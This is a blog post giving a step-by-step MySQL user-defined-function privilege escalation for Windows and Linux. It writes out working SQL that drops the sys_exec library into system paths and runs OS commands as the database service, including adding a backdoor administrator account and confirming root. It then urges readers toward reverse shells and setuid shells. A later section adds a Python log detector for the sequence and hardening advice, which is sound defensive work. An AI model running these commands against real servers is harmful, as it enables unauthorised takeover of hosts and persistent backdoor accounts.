# MySQL User-Defined Function (UDF) Privilege Escalation (Windows & Linux)

By [int0x33](https://paragraph.com/@int0x33) · 2021-11-17

---

We will get into writing our own functions in later posts, but for now the precompiled UDF shared objects that ship with SQLMap work well.

[https://github.com/int0x33/sqlmap/tree/master/udf/mysql](https://github.com/int0x33/sqlmap/tree/master/udf/mysql)

### Windows Escalation

    mysql> USE mysql;
    mysql> CREATE TABLE pwn(line blob);
    mysql> INSERT INTO pwn values(load_file('C://xampplite//htdocs//mail//lib_mysqludf_sys.dll'));
    mysql> SELECT * FROM mysql.pwn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
    mysql> CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
    mysql> SELECT sys_exec("net user pwned pwn123! /add");
    mysql> SELECT sys_exec("net localgroup Administrators pwned /add");
    

### Linux Escalation

    mysql> use mysql;
    mysql> create table pwn(line blob);
    mysql> insert into pwn values(load_file('/home/npn/lib_mysqludf_sys.so'));
    mysql> select * from pwn into dumpfile '/usr/lib/lib_mysqludf_sys.so';
    mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
    mysql> select sys_exec('id > /tmp/out; chown npn.npn /tmp/out');
    

### Verify Command Execution

    user@box:/$ cat /tmp/out
    uid=0(root) gid=0(root) groups=0(root)
    

You can now execute code as root, because `sys_exec` runs commands with the privileges of the MySQL server process. What more do you need? You can allow sudo ALL with no password, create a setuid shell program in C, execute a reverse shell, etc., whatever you want. Be creative.
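Seen from the defender's side, the statement sequence above leaves a distinctive trail in a MySQL general query log. The following is an added example, not part of the original post: a Python detector run over constructed log lines, where the log layout, the stage names and the sample entries are assumptions.

```python
import re

# Assumed general query log layout: <timestamp> <thread id> <command> <argument>
LINE = re.compile(r"^(\S+)\s+(\d+)\s+Query\s+(.*)$")
WRITE_LIB = re.compile(r"into\s+(?:dump|out)file\s+'([^']+\.(?:so|dll))'", re.I)
REGISTER = re.compile(
    r"create\s+(?:aggregate\s+)?function\s+(\w+)\s+returns\s+\w+\s+soname\s+'([^']+)'", re.I)
STAGES = ["library_write", "udf_register", "udf_call"]  # hypothetical stage names

def detect(lines):
    """Return (thread_id, stage, detail) findings in log order."""
    findings, udfs = [], {}  # udfs: registered function name -> library file
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # only Query entries carry SQL text
        _, tid, sql = m.groups()
        wrote, reg = WRITE_LIB.search(sql), REGISTER.search(sql)
        if wrote:
            findings.append((tid, "library_write", wrote.group(1)))
        elif reg:
            udfs[reg.group(1).lower()] = reg.group(2)
            findings.append((tid, "udf_register", reg.group(1).lower()))
        else:
            # UDFs are server-wide, so a call from any thread counts.
            for name in udfs:
                if re.search(rf"\b{re.escape(name)}\s*\(", sql, re.I):
                    findings.append((tid, "udf_call", name))
    return findings

def full_chain(findings):
    """True when write, register and call all appear, in that order."""
    pending = list(STAGES)
    for _, stage, _ in findings:
        if pending and stage == pending[0]:
            pending.pop(0)
    return not pending

# Constructed sample log (statements taken from the Linux section above).
SAMPLE_LOG = """\
2021-11-17T10:00:03.000000Z\t   12 Query\tinsert into pwn values(load_file('/home/npn/lib_mysqludf_sys.so'))
2021-11-17T10:00:04.000000Z\t   12 Query\tselect * from pwn into dumpfile '/usr/lib/lib_mysqludf_sys.so'
2021-11-17T10:00:05.000000Z\t   12 Query\tcreate function sys_exec returns integer soname 'lib_mysqludf_sys.so'
2021-11-17T10:00:06.000000Z\t   12 Query\tselect sys_exec('id > /tmp/out; chown npn.npn /tmp/out')
2021-11-17T10:00:07.000000Z\t   15 Query\tselect count(*) from orders
""".splitlines()

if __name__ == "__main__":
    print(detect(SAMPLE_LOG), "full chain:", full_chain(detect(SAMPLE_LOG)))
```

The general query log is off by default (`general_log`), so this only helps where it or an equivalent audit log is enabled. On the preventive side, restrict the `FILE` privilege, set `secure_file_priv`, and do not run `mysqld` as root.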

---

*Originally published on [int0x33](https://paragraph.com/@int0x33/mysql-user-defined-function-udf-privilege-escalation-windows-linux)*
